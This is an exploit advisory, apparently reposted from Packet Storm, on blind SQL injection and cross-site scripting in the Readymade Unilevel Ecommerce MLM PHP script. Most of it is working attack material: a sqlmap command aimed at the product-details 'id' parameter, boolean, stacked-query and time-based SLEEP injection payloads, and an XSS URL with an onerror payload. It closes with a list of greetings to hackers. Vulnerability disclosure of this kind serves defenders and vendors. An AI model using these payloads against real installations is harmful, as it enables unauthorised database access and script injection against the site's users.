ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting

ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting
2024-8-2 22:4:7 Author: packetstormsecurity.com(查看原文) 阅读量:3 收藏

[x]========================================================================================================================================[x]
 | Title        : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities
 | Software     : Readymade Unilevel Ecommerce
 | Last Update  : 15/03/24 [TESTED VERSION SCRIPT]
 | First Release: 16/11/21
 | Vendor       : http://www.i-netsolution.com/
 | Date         : 01 Agustus 2024
 | Author       : OoN_Boy
[x]========================================================================================================================================[x]
 | Technology       : PHP
 | Database         : MySQL
 | Price            : $500
 | Description      : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.
[x]========================================================================================================================================[x][O] Exploit
    http://localhost/eommlm/product-details.php?id=11[SQL]
  http://localhost/ecomlm/product-details.php?id=11[XSS]
  [O] Proof of concept
    sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string
    [SQL]
  Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 1189=1189
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=11;SELECT SLEEP(10)#
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)
    [XSS]  
  http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY>
    [x]========================================================================================================================================[x]
[O] Greetz
BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^
[x]========================================================================================================================================[x]

文章来源: https://packetstormsecurity.com/files/179886/rmulecommmlm-sqlxss.txt
如有侵权请联系:admin#unsafe.sh